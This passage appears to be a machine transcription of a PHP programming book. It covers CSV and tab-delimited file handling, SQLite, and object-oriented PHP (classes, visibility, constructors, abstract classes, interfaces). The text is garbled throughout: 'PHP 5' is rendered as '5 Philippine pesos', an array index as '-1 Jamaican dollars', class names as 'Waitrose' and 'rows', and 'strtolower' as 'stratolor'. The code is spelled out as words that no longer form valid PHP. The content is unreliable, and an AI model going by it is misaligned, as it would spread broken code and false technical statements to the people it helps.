start of the next, creating a comma-delimited file. The following PHP statements create the CSV file. $address equals John Smith, 1234 Oak Street, Big City, Oregon, 99999. $address equals Mary Jones, 5678 Pine Street, Bigger City, Maine, 11111. $address equals Luis Rojas, 1234 Elm Street, Biggest City, Texas, 88888. $fh equals Fopen. Addressbook.txt a. 4. $I equals 0. $I less than 3. $I plus plus. Opening curly bracket. F right. $fh. $address. $I. N. Closing curly bracket. F close. $fh. Reading a comma-delimited file. PHP can read the CSV file by using either the file or the fgets function. As described in the section Reading a File into an Array earlier in this chapter. However, PHP provides a function called fgetcsv that's designed specifically to read CSV files. When you use this function to read a line in a CSV file, the line is stored in an array, with each column entry in an element of the array. For example, you can use the function to read the first line of the address book CSV file, as shown here. $address equals fgetcsv. $fh, 1000. In this statement, $fh is the file handle, and 1000 is the number of characters. To read an entire line, use a number of characters that is longer than the longest line. The result of this statement is an array, as follows. $address 0 equals John Smith. $address 1 equals 1234 Oak Street. $address 2 equals Big City. $address 3 equals OR. $address 4 equals 99999. Using other delimiters, the CSV file works well for transferring data in many cases. However, if a comma is part of the data, commas can't be used to separate the columns. For example, suppose one of the data lines is this: Smith Company, Inc., 1234 First Street, Big City, Oregon, 99999. The comma in the company name would divide the data into 2 columns. Smith Company in the first and Inc. in the second, making 6 columns, instead of 5. Exchanging data with other programs. When the data contains commas, you can use a different character to separate the columns. For example, tabs are commonly used to separate call, UMNS, This file is called a tab separated values (TSV) file, or a tab delimited file. You can write a tab delimited file by storing T rather than a comma. In the output file, you can read a file containing tabs by specifying the column separator in the statement as follows: $address equals FGETCSV, $FH 1000 T. You can use any character to separate columns. The script in listing 3-3 contains a function that converts any CSV file into a tab delimited file. Listing 3-3, a script that converts a CSV file into a tab delimited file. Less than PHP asterisk script name convert asterisk description reads in a CSV file and outputs a asterisk tab delimited file. The CSV file must have a asterisk CSV extension asterisk $myfile equals testing. Function convert $filename opening curly bracket if at $fh underscore in equals fopen $filename.csv r opening curly bracket $fh underscore out equals fopen $filename.tsv a while fee $fh underscore in opening curly bracket closing curly bracket $line equals FGETCSV $fh underscore in 1024 if $line 0 equals opening curly bracket closing curly bracket f right $fh underscore out n else f right $fh underscore out implode $line t n closing curly bracket f close $fh underscore in f close $fh underscore out closing curly bracket else echo file doesn't exist n return false closing curly bracket 7 8 10 12 13 15 16 20 21 27 exchanging data with other programs 393 echo conversion completed n return true closing curly bracket convert $myfile greater than. The following points refer to the line numbers in the listing 3-3. 7 8 this line defines the file name as testing. 32 34 this line defines a function named convert with one parameter $filename. 10 this line opens a file that has the file name that was passed to the function with a .csv extension. The file is opened in read mode. If the file is opened successfully, the conversion statements in the if block are executed. If the file isn't found, the else block, beginning on line 27, is executed. 12 this line opens a file that has the file name that was passed to the function with a .tsv extension. The file is opened in append mode. The file is in the current directory in this script. If the file is in another directory where you think there is any possibility the file might not open in write mode, use an if statement here to test where the file opened and perform some action if it did not. 13 this line starts a while loop that continues to the end of the file. 15 this statement reads one line from the input file into the array. $line. Each column entry is stored in an element of the array. 16 this statement tests whether the line from the input file has any text on it. If the line doesn't have any text, a new line character is stored in the output file. Thus, any empty lines in the input file are stored in the output file. 20 if the line from the input file isn't empty, it's converted to a tab delimited format and written into the output file. 21 this statement converts the line and writes it to the output file in one statement. The implode function converts the array $line into a string with the elements separated by a tab. 27. This else block executes when the input file can't be found. An error message is echoed, and the function returns false. 32. The function has completed successfully, so it returns true. 34. This line calls the function, passing a file name to the function in the variable $myfile, using SQLite. Using SQLite, beginning with 5 Philippine pesos. PHP includes the SQLite software by default. SQLite is designed to store data in a flat file using SQL queries. SQL is explained in Book 5, Chapter 1. SQLite is a quick, easy way to store data in a flat file. However, it's less secure than a database and can't handle complex data. In most cases, you should store your data in MySQL, but you occasionally might want to store your data in a flat file. For example, you might want to write the data in a format that can be read by another program, such as Excel. Storing and retrieving data with SQLite is similar to the methods described in Book 5 for using MySQL with PHP. You use SQL to communicate with the data file and use PHP functions to send the SQL and retrieve the data. You interact with the data by using the same steps that you use with a database, as follows. 1. Connect to the data file. 2. Send in SQL query. 3. If you retrieved data from the data file, process the data. 4. Close the connection to the data file. Here are more details on how to complete each of those steps. To connect to the data file, use the following PHP function. $db equals SQLite_open testdb. This statement opens the data file testdb. If the file doesn't exist, the func creates it. To send in SQL query, use the SQLite_query function, as follows. $SQL equals select asterisk from product. $result equals SQLite_query. $db, $SQL. The retrieved data is stored in a temporary table in rows and columns. You can use PHP functions to retrieve one row from the temporary data table and store it in an array, with the field names as the array keys. The statement is as follows. $row equals SQLite_fetch_array. $result. Using SQLite 395. After this statement, $row is an array containing all the fields in the temporary table, such as the following. $row. First name equals John. $row. Last name equals Smith. To process all the data in the temporary table, you can use a loop to get one row at a time, processing each row until the end of the table is reached, as follows. While $row equals SQLite_fetch_ASOC. $result. Opening curly bracket. For each $row as $value. Opening curly bracket. Echo $value less than BR greater than. Closing curly bracket. Closing curly bracket. When you finish storing and/or retrieving data, you can close the data file with the following statement. SQLite_close. $db. Error handling for SQLite is similar to MySQL error handling, as explained in Book 5, Chapter 5. Also, as discussed in that chapter, when the query fails, an SQLite error message is generated, but not displayed unless you use a function developed specifically to display it. Thus, the following statements handle errors in addition to sending the SQL query. $SQL equals select asterisk from product. $result equals SQLite_query. $SQL. Or die. Query failed. SQLite_error. $row equals SQLite_fetch_array. $result. Most of the information in Book 5 about MySQL applies to the use of SQLite as well. What makes SQLite different is that the data is stored in a flat file, rather than stored by MySQL in files that are unique to MySQL.
Book 4, PHP, Chapter 4, Object-Oriented Programming. In this chapter, understanding object-oriented programming, planning an object-oriented script, defining and writing classes, dealing with errors by using exceptions, copying, comparing, and destroying objects. Object-oriented programming, OOP, is an approach to programming that uses objects and classes. It's in widespread use today, with many universities teaching object-oriented programming in beginning programming classes. Currently, Java and C++ are prevalent languages used for object-oriented programming. Object-oriented programming, with a limited feature set, is possible in 4 Philippine pesos. With 5 Philippine pesos, the object-oriented capabilities of PHP were greatly improved, with both more speed and added features. The information and sample scripts in this chapter are written for 5 Philippine pesos. Features that aren't available in 4 Philippine pesos are noted. This chapter introduces object-oriented programming with a specific focus on how to use OOP concepts as they apply to PHP. Introducing object-oriented programming. Object-oriented programming, sometimes shortened to OOP, isn't just a matter of using different syntax. It's a different way of analyzing programming problems. The application is designed by modeling the programming problem. For example, a programmer designing an application to support a company's sales department might look at the programming project in terms of the relationships between customers and sales and credit lines. In other words, in terms of the design of the sales department itself. In object-oriented programming, the elements of a script are objects. The objects represent the elements of the problem your script is meant to solve. For example, if the script is related to a used car lot, the objects are probably cars and customers. Or if the script is related to outer space, the objects would probably be stars and planets. Object-oriented programming developed new concepts and new terminology to represent those concepts. Understanding the terminology is the road to understanding object-oriented programming, and we explain that terminology to you here. Objects and classes. The basic elements of object-oriented programs are objects. It's easiest to understand objects as physical objects. For example, a car is an object. A car has properties, also called attributes, such as color, model, engine, and tires. A car has things it can do, too, such as move forward, move backward, park, roll over, and play dead. Well, ours does anyway. In general, objects are nouns. A person is an object. So are animals, houses, offices, garbage cans, coats, clouds, planets, and buttons. However, objects are not just physical objects. Like nouns, objects often are more conceptual. For example, a bank account isn't something you can hold in your hand, but it can be considered an object. So can a computer account or a mortgage. A file is often an object. So is a database. Email messages, addresses, songs, TV shows, meetings, and dates can all be objects. Objects in web applications might be catalogs, catalog items, shopping carts, customers, orders, or customer lists. A class is the PHP code that serves as the template, or the pattern, that is, used to create an object. The class defines the properties, the attributes, of the object. It also defines the things the object can do. its responsibilities. For example, you write a class that defines a car as 4 wheels and an engine. And the class lists the things a car can do, such as move forward and park. Then, given that class, you can write a statement similar to the following. That creates a car object. $mycar equals new car. The object $mycar is created from the definition in the class car. Your new car has 4 wheels and an engine and can move forward and park. As defined in the class car. When you use your car object $mycar, you might find that it's missing a few important things, such as a door, or a steering wheel, or a reverse gear. That's because you left an important item out of the class car when you wrote it. From a more technical point of view, an object is a complex, user-defined data type. The process of creating an object from a class is called instantiation. An object is an instance of a class. For instance, $mycar is an instance of the class car. Introducing Object-Oriented Programming 399. As the person who writes a class, you know how things work inside the class. However, the person who uses an object created from the class doesn't need to know how an object accomplishes its responsibilities. Most people have no clue how a telephone object works, but they can use it to make a phone call. The person who built the telephone knows what's happening inside it. When there's new technology, the phone builder can open a phone and improve it, as long as he doesn't change the interface, the keypad and buttons. It doesn't affect the use of the phone at all. Properties. Objects have properties, also sometimes called attributes. A car may be red, green, or covered in polka dots. A color property. Properties, such as color, size, or model for a car, are stored inside the object. Properties are set up in the class as variables. For example, the color attribute is stored in the object in a variable, given a descriptive name such as $color. Thus, the car object $mycar might contain $color equals red. The variables that store properties can have default values, can be given values when the object is created, or values can be added or modified later. For example, a $mycar object is created red, but when it's painted later, the $color property is changed to chartreuse. Methods. The things objects can do are sometimes referred to as responsibilities. For example, a car object can move forward, stop, back up, and park. Each thing an object can do, each responsibility, is programmed into the class and called a method. In PHP, methods use the same syntax as functions. Although the code looks like the code for a function, the distinction is that methods are inside a class. It can't be called independently of an object. PHP won't allow it. This type of function can perform its task only when called with an object. When creating methods, give them names that are descriptive of what they do. For instance, a customer order class might have methods such as display order, get total cost, compute sales tax, and cancel order. Methods, like other PHP entities, can be named with any valid name, but they're often named with camel caps. By convention, as shown here, the methods are the interface between the object and the rest of the world. The object needs methods for all its responsibilities. Objects should interact with the outside world only through their methods. For example, suppose your object is a catalog item that is for sale. One of its properties is $price. You don't want $price to be easily changed by a simple statement, such as developing an object-oriented script. Instead, you want a method called changePrice. That is the only way the price can be edited. The method includes checks to be sure that only legitimate Mate users can use it to change the price. A good object should contain all it needs to perform its responsibilities. But not a lot of extraneous data. It shouldn't perform actions that are another object's responsibility. The car object should travel and should have everything it needs to perform its responsibilities, such as gas, oil, tires, engine, and so on. The car object shouldn't cook and doesn't need to have salt or frying pans. Nor should the cook object carry the kids to soccer practice. Inheritance. Objects should contain only the properties and methods they need. No more, no less. One way to accomplish that is to share properties and methods between classes by using inheritance. For example, suppose you have 2 rose objects, one with white roses and one with red roses. You could write 2 classes, a red rose class and a white rose class. However, a lot of the information is the same for both objects. Both are bushes, both are thorny, and both bloom in June. Inheritance enables you to eliminate the duplication. You can write one class called rows. You can store the common information in this class, such as $plant equals bush, $stem equals thorns, and $blooms equals June. Then you can write subclasses for the 2 rose types. The rose class is called the master class or the parent class. Red rose and white rose are the subclasses, which are referred to as child classes, or the kids. As a favor, ITE professor fondly referred to them. Child classes inherit all the properties and methods from the parent class. But they can also have their own individual properties, such as $color equals white for the white rose class and $color equals red for the red rose class. A child class can contain a method with the same name as a method in a parent class. In that case, the method in the child class takes precedence. For a child object, you can specify the method in the parent class for a child object if you want, but if you don't, the child class method is used. Some languages allow a child class to inherit from more than one parent class, called multiple inheritance. PHP doesn't allow multiple inheritance. A class can inherit from only one parent class. Developing an object-oriented script. Object-oriented scripts require a lot of planning. You need to plan your objects and their properties and what they can do. Your objects need to cover all their responsibilities without encroaching on the responsibilities of other objects. For complicated projects, you might have to do some model building and testing before you can feel reasonably confident that your project plan includes all the objects it needs. Developing object-oriented scripts includes the following procedures, which the next sections cover in more detail. 1. Choose the objects. 2. Choose the properties and methods for each object. 3. Create the object and put it to work. Choosing objects. Your first task is to develop the list of objects needed for your programming project. If you're working alone and your project is small, the objects might be obvious. However, if you're working on a large, complex project, selecting the list of objects can be more difficult. For example, if your project is developing the software that manages all the tasks in a bank, your list of possible objects is large: account, teller, money, checkbook, wastebasket, guard, vault, alarm system, customer, loan, interest, and so on. But do you need all those objects? What is your script going to do with the wastebasket in the front lobby or the guard? Well, perhaps your script needs to schedule shifts for the guards. When you're planning object-oriented programs, the best strategy for identifying your objects is to list all the objects you can think of. That is, all the nouns that might have anything at all to do with your project. Sometimes, programmers can take all the nouns out of the project proposal documenta to develop a pretty comprehensive list of possible objects. After you create a long list of possible objects, your next task is to cross off as many as possible. You should eliminate any duplicates, objects that have overlapping responsibilities, and objects that are unrelated to your project. For example, if your project relates to building a car, your car project probably needs to have objects for every part in the car. On the other hand, if your project involves traffic control in a parking garage, you probably need only a car object that you can move around. The car's parts don't matter for this project. Selecting properties and methods for each object. When you have a comprehensive list of objects, you can begin to develop the list of properties for each object. Ask yourself what you need to know about each object. For example, for a car repair project, you probably need to know things like when the car was last serviced, its repair history, any accidents, details about the parts, and so on. For a project involving parking, garage traffic, you probably need to know only the car's size. How much room does the car take up in the parking garage? You need to define the responsibilities of each object. And each object needs to be independent. It needs methods for actions that handle all of its responsibilities. For example, if one of your objects is a bank account, you need to know what a bank account needs to do. Well, first, it needs to be created, so you can define an open new account method. It needs to accept deposits and disperse withdrawals. It needs to keep track of the balance. It needs to report the balance when asked. It might need to add interest to the account periodically. Such activities come to mind quickly. However, a little more thought, or perhaps testing, can reveal activities that you overlooked. For example, the account stores information about its owner, such as name and address. Did you remember to include a method to update that information when the customer moves? It might seem trivial compared to moving the money around, but it won't seem trivial if you can't do it. Creating and using an object. After you decide on the design of an object, you can create and then use the object. The steps for creating and using an object are as follows. 1. Write the class statement. The class statement is a PHP statement that is the blueprint for the object. The class statement has a statement block that contains PHP code for all the properties and methods that the object has. 2. Include the class in the script where you want to use the object. You can write the class statement in the script itself. However, it's more common to save the class statement in a separate file and use an include statement to include the class at the beginning of the script. That needs to use the object. 3. Create an object in the script. You use a PHP statement to create an object based on the class. This is called instantiation. 4. Use the new object. After you create a new object, you can use it to perform actions. You can use any method that is inside the class statement block. The rest of this chapter provides the details needed to complete these steps. Defining a class. After you've determined the objects, properties, and methods your project requires, you're ready to define classes. The class is the template, pattern, for the object. Defining a class. You write the class statement to define the properties and methods for the class. The class statement has the following general format. Class name, opening curly bracket. Add statements that define the properties. Add all the methods, closing curly bracket. You can use any valid PHP identifier for the class name, except the name, std class. PHP uses the name std class internally, so you can't use this name All the property settings and method definitions are enclosed in the opening and closing curly braces. If you want a class to be a subclass that inherits properties and methods, use a statement similar to the following. Class Waitrose extends rows, opening curly bracket. Add the property statements. Add the methods, closing curly bracket. The object created from this class has access to all the properties and methods of both the Waitrose child class and the rows class. The rows class, however, doesn't have access to properties or methods in the child class. Waitrose. Imagine, the child owns everything the parent owns, but the parent owns nothing of the child's. What an idea! The next few sections show you how to set properties and define methods within the class statement. For a more comprehensive example of a complete class statement, see the section, Putting it all together, later in this chapter. Setting properties. When you're defining a class, you declare all the properties at the top of the class, as follows. Class car, opening curly bracket, private $color, private $tires, private $gas. Method statements. Book 4, Chapter 4, Object-Oriented Programming, closing curly bracket. PHP doesn't require you to declare variables. In the other PHP scripts discussed in this book, variables aren't declared, they're just used. You can do the same thing in a class. However, it's much better to declare the proper ties in a class. By including declarations, classes are much easier to understand. It's poor programming practice to leave this out. Each property declaration begins with a keyword that specifies how the property can be accessed. The three keywords are public. The property can be accessed from outside the class, either by the script or from another class. Private. No access is granted from outside the class, either by the script or from another class. Protected. No access is granted from outside the class except from a class that's a child of the class with the protected property or method. Classes should be written so that methods are used to access properties. By declaring a property to be private, you make sure that the property can't be accessed directly from the script. If you want to set default values for the properties, you can, but the values allowed or restricted, you can declare a simple value, but not a computed one, as detailed in the following examples. The following variable declarations are allowed as default values. Private $color equals black. Private $gas equals 10. Private $tires equals 4. The following variable declarations are not allowed as default values. Private $color equals blue, black. Private $gas equals 10.3. Private $tires equals 2*2. An array is allowed in the variable declaration, as long as the values are simple, as follows. Private $doors equals array. Front, back. To set or change a variable's value when you create an object, use the constructor, described in the Writing the Constructor section, later in this chapter, or a method you write for this purpose. Accessing properties using $this. Inside a class, $this is a special variable that refers to the properties of the same class. $this can't be used outside of a class. It's designed to be used in statements inside a class to access variables inside the same class. Defining a class. 405. The format for using $this is the following. $this to varname. For example, in a customer order class that has a property $total cost, you would access $total cost in the following way. $this to total cost. Using $this refers to $total cost inside the class. You can use $this as shown in any of the following statements. $this to total cost equals 200.25. If $this to total cost greater than 1,000. $product. $this to size equals $price. As you can see, you use $this to varname in all the same ways you would use $varname. Notice that a $sign appears before this but not before gas. Don't use a $sign before total cost, as in $this greater than total cost, because it changes your statement's meaning. You might or might not get an error message, but it isn't referring to the variable total cost inside the current class. Adding methods. Methods define what an object can do and are written in the class in the same format you'd use to write a function. For example, your customer order might need a method that adds an item onto the total cost of the order. You can have a variable called total that contains the current total cost. You can write a method that adds the price of an item to the total cost. You could add such a method to your class as follows. Class customer order, opening curly bracket, private $total equals O. Function add item, $amount, opening curly bracket, $this to total equals $this to total plus $amount. Echo $amount was added. Current total is $this to total. Closing curly bracket, closing curly bracket. This looks just like any other function, but it's a method because it's inside a class. You can find details about writing functions in Chapter 2 in this mini-book. Defining a class. Like functions, methods accept values passed to them. The values passed need to be the correct data type to be used in the function. See Chapter 1 in this mini-book for a discussion of data types. For instance, in the preceding example, $amount needs to be a number. Your method should include a check to make sure that the value is a number. For instance, you might write the method as follows. Class customer order, opening curly bracket, private $total equals 0.0. Function add item, $amount, opening curly bracket, if is underscore numeric, $amount, opening curly bracket, $this to total equals $this to total plus $amount. Echo $amount added. Current total is $this to total. Closing curly bracket, else. Echo value passed is not a number. Closing curly bracket, closing curly bracket, closing curly bracket. If the value passed is an integer, a float, or a string that is a number, the amount is added. If not, the error message is displayed. The sum in $total is a float because it is assigned a number with a decimal point in it. When the amount passed in is added to $sum, it is automatically converted to a float. By PHP, when you write methods, PHP allows you to specify that the value passed must be an array or a particular object. Specifying what to expect is called type hinting. If the value passed is not the specified type, an error message is displayed. You don't need to add statements in the method to check for array or object data types. For example, you can specify that an array is passed to a function as follows. Class adding machine, opening curly bracket, private $total equals O. Add numbers, array $numbers, opening curly bracket, for $I equals 0, $I less than equals size of $numbers, $I plus plus, opening curly bracket, $this to total equals $this to total plus $numbers, $I, closing curly bracket, closing curly bracket, closing curly bracket. Defining a class. 407. If you attempt to pass a value to this method that is not an array, an error message similar to the following is displayed. Catchable fatal error. Argument 1 passed to adding machine. Add numbers. Must be an array. Integer. Given. This error states that an integer was passed instead of the required array. The error is fatal, so the script stops at this point. You can also specify that the value passed must be a specific object, as follows. Class shopping cart, opening curly bracket, private $items equals array, private $n underscore items equals O, function add item, item $item, opening curly bracket, $this to items, equals $item, $this to n underscore items equals $this to n underscore items plus 1. Closing curly bracket, closing curly bracket. The shopping cart class stores the items in the shopping cart as an array of item objects. The method addItem is defined to expect an object that was created from the class item. If a value is passed to the addItem method, that is not an item object. An error message is displayed, and the script stops. Methods can be declared public, private, or protected, just as properties can. Public is the default access method if no keyword is specified. PHP provides some special methods with names that begin with underscore underscore. 2. Underscores. PHP handles these methods differently internally. This chapter discusses 3 of these methods: construct, destruct, and clone. Don't begin the names of any of your own methods with 2 underscores unless you're taking advantage of a PHP special method. Understanding public and private properties and methods. Properties and methods can be public or private. Public means that methods or properties inside the class can be accessed by the script that is using the class or from another class. For example, the following class has a public property and a public method. Class car, opening curly bracket, public $gas equals O, function add gas, $amount, opening curly bracket, defining a class, $this to gas equals $this to gas plus $amount. Echo $amount gallons added to gas tank. Closing curly bracket, closing curly bracket. The public property in this class can be accessed by a statement in the script outside the class, as follows. $mycar equals new car. $gas underscore amount equals $mycar to gas. After these statements are run, $gas underscore amount contains the value stored in $car inside the object. The property can also be modified from outside the class, as follows. $mycar to gas equals 20, allowing script statements outside the class to directly access the proper ties of an object is poor programming practice. All interaction between the object and the script or other classes should take place using methods. The example class has a method to add gas to the car. All gas should be added to the car by using the add gas method, which is also public, using statements similar to the following. $new underscore car equals new car. $new underscore car to add gas. 5. You can prevent access to properties by making them private, as follows. Private $gas equals O, with the property specified as private, a statement in the script that attempts to access the property directly, as follows. $mycar to gas equals 20, gets the following error message. Fatal error. Cannot access private property car. $gas in C, /testclass.php on line 17. Now, the only way gas can be added to the car is by using the add gas method. Because the add gas method is part of the class statement, it can access the private property. In the same way, you can make methods private or protected. In this case, you want the outside world to use the add gas method. However, you might, defining a class, 409, want to be sure that people buy the gas that is added. You don't want any stolen gas in the car. You can write the following class. Class car, opening curly bracket, private $gas equals O, private function add gas, $amount, opening curly bracket, $this to gas equals $this to gas plus $amount. Echo $amount gallons added to gas tank. Closing curly bracket. Function by gas. $amount. Opening curly bracket. $this to add gas. $amount. Closing curly bracket. Closing curly bracket. With this class, the only way gas can be added to the car from the outside is with the buy gas method. The buy gas method uses the add gas method to add gas to the car, but the add gas method can't be used outside the class because it's private. If a statement outside the class attempts to use add gas, as follows, a fatal error is displayed, as it was for the private property. $new underscore car equals new car. $new underscore car to add gas. 5. However, a statement outside the class can now add gas to the car by using the buy gas method, as follows. $new underscore car equals new car. $new underscore car to buy gas. 5. You see the following output. 5 gallons added to gas tank. It's good programming practice to hide as much of your class as possible. Make all properties private. You should make methods public only if they absolutely need to be public. Writing the constructor. The constructor is a special method, added with 5 Philippine pesos, that is executed when an object is created using the class as a pattern. A constructor isn't required, and you don't need to use a constructor if you don't want to set any property values or perform any actions when the object is created. Only one constructor is allowed. The constructor has a special name so that PHP knows to execute the method when an object is created. Constructors are named __ construct. 2 underscores. A constructor method looks similar to the following. Function __ construct. Opening curly bracket. $this to total equals 0. Hash starts with a 0 total. Closing curly bracket. This constructor defines the new customer order. When the order is created, the total cost is 0. Prior to 5 Philippine pesos, constructors had the same name as the class. You might run across classes written in this older style. 5 Philippine pesos and later scripts look first for a method called __ construct to use as the constructor. If it doesn't, find one. It looks for a method that has the same name as the class and uses that method for the constructor. Thus, older classes still run under 5 Philippine pesos. And 6. Putting it all together, your class can have as few or as many properties and methods as it needs. The methods can be simple or complicated, but the goal of object-oriented programming is to make the methods as simple as is reasonable, rather than cram everything into one method. It's better to write several smaller methods and have one method call another as needed. The following is a simple class. Class message handler. Opening curly bracket. Private $message. Function __ construct. $message. Opening curly bracket. $this to message equals $message. Closing curly bracket. Function display message. Opening curly bracket. Echo $this to message. N. Closing curly bracket. Closing curly bracket. The class has one property. $message. That stores a message. The message is stored in the constructor. The class has one method. Display message. Echoing the stored message is the only thing the message handler object can do. Suppose you want to add a method that changes the message to lowercase and then automatically displays the message. The best way to write that expanded class is as follows. Class message handler. Opening curly bracket. Private $message. Function __ construct. $message. Opening curly bracket. $this to message equals $message. Closing curly bracket. Function display message. Opening curly bracket. echo $this to message, n. Closing curly bracket, function lowercase message, opening curly bracket, $this to message equals stratolor, $this to message, $this to display message, closing curly bracket, closing curly bracket. Note the lowercase message method, because the class already has a method to display the message. This new lowercase message method uses the existing display message method rather than repeating the echo statement. Anytime you write a method and find yourself writing code that you've already written in a different method in the same class, you need to redesign the methods. In general, you shouldn't have any duplicate code in the same class. The example in listing 4-to-1 is a complicated class that can be used to create an HTML form. To simplify the example, the form contains only text input fields. Listing 4-to-1, a script that contains a class for a form object. Less than PHP asterisk class name form asterisk description, a class that creates a simple HTML form asterisk containing only text input fields. The asterisk class has three methods. Asterisk class form, opening curly bracket, private $fields equals array, hash contains field names and labels, private $action value, hash name of script to process form, private $submit equals submit form, hash value on submit button. Listing 4-to-1, continued, private $n fields equals O, hash number of fields added to the form, asterisk constructor, user passes in the name of the script where asterisk form data is to be sent, $action value, and the value to asterisk display on the submit button, asterisk, function __ construct, $action value, $submit, opening curly bracket, $this to action value equals $action value, $this to submit equals $submit, closing curly bracket, asterisk display form function, displays the form, asterisk, function display form, opening curly bracket, echo n less than form action equals $this to action value, method equals post greater than n, 4, $j equals 1, $j less than equals size of, $this to fields, $j plus plus, opening curly bracket, echo less than p style equals clear, left, margin, 0, padding, 0, padding top, 5px greater than n, echo less than label style equals float, left, width, 20% greater than, $this to fields, -1 Jamaican dollars, label, closing curly bracket, less than label greater than n, echo less than input style equals width, 200px type equals text, name equals $this to fields, -1 Jamaican dollars, name, greater than less than p greater than n, closing curly bracket, echo less than input type equals submit value equals $this to submit, style equals margin left, 25%, margin top, 10px greater than n, echo less than form greater than, closing curly bracket, asterisk function that adds a field to the form. The user needs to asterisk send the name of the field and a label to be displayed. Asterisk, function add field, $name, $label, opening curly bracket, $this to fields, $this to n fields, name, equals $name, $this to fields, $this to n fields, label, equals $label, $this to n fields equals $this to n fields plus 1, closing curly bracket, greater than. This class contains 4 properties and 3 methods. The properties are as follows: $fields, an array that holds the fields as they are added by the user. The fields in the form are displayed from this array. Using a class in a script. 413. $action value. The name of the script that the form is sent to. This variable is used in the action attribute when the form tag is displayed. $submit. The text that the user wants displayed on the submit button. This variable's value, submit form by default, is used when the submit button is displayed. $n fields. The number of fields that have been added to the form so far. The methods in this class are as follows. __construct, the constructor, which sets the values of $action value, and $submit from information passed in by the user. Add field, adds the name and label for the field to the $fields array. If the user added fields for first name and last name to the form, the array might look as follows. $fields. 1. Name equals first _ name. $fields. 1. Label equals first name. $fields. 2. Name equals last _ name. $fields. 2. Label equals last name, and so on. Display form displays the form. It echoes the HTML needed for the form and uses the values from the stored variables for the name of the field and the label that the user sees by the field. The next section describes how to use a class, including the form class, shown in listing 4:1. Using a class in a script. The class code needs to be in the script that uses the class. Most commonly, the class is stored in a separate include file and is included in any script that uses the class. To use an object, you first create the object from the class. Then that object can perform any methods that the class includes. Creating an object is called instantiating the object, just as you can use a pattern to create many similar but individual dresses. You can use a class to create many similar but individual objects. To create an object, use statements that have the following format. $object name equals new class name. Value. Some valid statements that create objects are $Joe equals new person. Male. $car _ Joe equals new car. Red. Using a class in a script. $car _ Sam equals new car. Green. $customer1 equals new customer. Smith Joe $cust ID. The object is stored in the variable name, and the constructor method is executed. You can then use any method in the class with statements of the following format. $Joe to go to work. $car _ Joe to park. Illegal. $car _ Sam to paint car. Blue. $name equals $customer1 to get name. Different objects created from the same class are independent individual. ALS. Sam's car gets painted blue, but Joe's car is still red. Joe gets a parking ticket, but it doesn't affect Sam. The script shown in listing 4:2 shows how to use the form class that was created in the preceding section and shown in listing 4:1. Listing 4:2, a script that creates a form. Less than PHP * script name build form * description uses the form to create a simple HTML form. * require _ once form class echo less than HTML greater than less than head greater than less than title greater than phone form less than title greater than less than head greater than less than body greater than $phone _ form equals new form. Process.php submit phone. $phone _ form to add field. First _ name first name. $phone _ form to add field. Last _ name last name. $phone _ form to add field. Phone. Echo less than H3 greater than please fill out the following form. Less than H3 greater than. $phone_form to display form. Echo less than body greater than less than HTML greater than. First, the script includes the file containing the form class in the script. The class is stored in the file form class. The script creates a new form object called $phone_form. 3 fields are added with the add field method. The form is displayed with the display form method. Notice that some additional HTML code is output in this script. That HTML could have been added to the display form method just as easily. The script creates a form with 3 fields. Using the form class, Figure 4:1 shows the resulting web page. Book 4, Chapter 4, Object-Oriented Programming, Using Abstract Methods in Abstract Classes and Interfaces 415. Figure 4:1, the form, displayed by the script in Listing 4:2, Using Abstract Methods in Abstract Classes and Interfaces. You can use abstract methods that specify the information to be passed, but do not contain any code. And we tell you how to do that in the following sections. Abstract methods were added in 5 Philippine pesos. You can use abstract methods in abstract classes or in interfaces. An abstract class contains both abstract methods and non-abstract methods. An interface contains only abstract methods. Using an abstract class, any class that has an abstract method must be declared an abstract class. The function of an abstract class is to serve as a parent for a child class. You cannot create an object from an abstract class. An abstract class specifies the methods for a child class. The child class must implement the abstract methods that are defined in the parent class. Although each child class can implement the abstract method differently, with different code, if an abstract method specified in the parent class is not included in a child class, a fatal error occurs. 416. Using abstract methods in abstract classes and interfaces. An abstract method specifies the values to pass, called the signature. The child implementation of the abstract method must use the same signature. The child must define the method with the same or weaker visibility. For example, if the abstract method is declared protected, the child implementer tion of the method must be declared protected or public. The following code shows the use of an abstract class. An abstract class named message is defined. Then 2 child classes are defined. Abstract class message, opening curly bracket, protected message underscore content, function underscore construct, $text, opening curly bracket, $this to message underscore content equals $text, closing curly bracket, abstract public function display message, $color, closing curly bracket, class giant message extends message, opening curly bracket, public function display message, $color, opening curly bracket, echo less than h1 style equals color, $color greater than, this to message underscore content less than h1 greater than, closing curly bracket, class big message extends message, opening curly bracket, public function display message, $color, opening curly bracket, echo less than h2 style equals color, $color greater than, this to message underscore content less than h2 greater than, closing curly bracket, the abstract class message includes an abstract method named display message. This abstract method is implemented in the 2 child classes, giant message and big message. In giant message, the message content is displayed with an less than h1 greater than tag in the color passed to the method. In big message, the message is displaying with an less than h2 greater than tag in the color passed. Thus, both child classes implement the abstract method, but they implement it differently. If a child class doesn't implement the abstract class, an informative error message is displayed, stating exactly how many abstract classes are not implemented and their names. The error is fatal, so the script stops at that point. You can implement an interface at the same time you extend a class, including an abstract class. Using interfaces is described in the next section. Using interfaces. An interface contains only abstract methods. The function of an interface is to enforce a pattern on a class by specifying the methods that must be implemented in the class. You cannot create an object from an interface. An interface can't have the same name as a class used in your script. All methods specified in an interface must be public. Don't use the keyword abstract for methods in an interface. When a class implements an interface, all the methods in the interface must be implemented in the class. If a method is not implemented, a fatal error occurs. You implement an interface in a class with the following format. Class name implements interface name. You can implement more than one interface in a class, as follows. Class name implements interface name 1, interface name 2. Multiple interfaces implemented by a single class may not contain methods with the same name. The following example shows the use of both inheritance and an interface. Interface movable, opening curly bracket, function move forward, $distance, closing curly bracket, class car, opening curly bracket, protected $gas equals O, function _ construct, $amt, opening curly bracket, $this to gas equals $amt, echo less than p greater than at creation, car contains $this to gas, gallons of gas less than p greater than, closing curly bracket, class sedan extends car implements movable, opening curly bracket, private $mileage equals 18, public function move forward, $distance, opening curly bracket, preventing changes to a class or method, $this to gas equals $this to gas, round, $distance $this to mileage, 2, echo less than p greater than after moving forward $distance miles. Sedan contains $this to gas gallons of gas, less than p greater than. Closing curly bracket, the class sedan is a child of the class car, which is not an abstract class, and also implements the interface movable. You can use the preceding code with the following statements. $my_car equals new sedan, 20, $my_car to move forward, 50. The following displays in the browser window. At creation, car contains 20 gallons of gas. After moving forward 50 miles, sedan contains 17.22 gallons of gas. The first statement displays when the object $my_car is created. Because the sedan class doesn't have a constructor, the constructor in the car class runs and produces the first line of output. The second statement displays when the move forward method is used, preventing changes to a class or method. You might want a class to be used exactly as you have written it. You can prevent the creation of 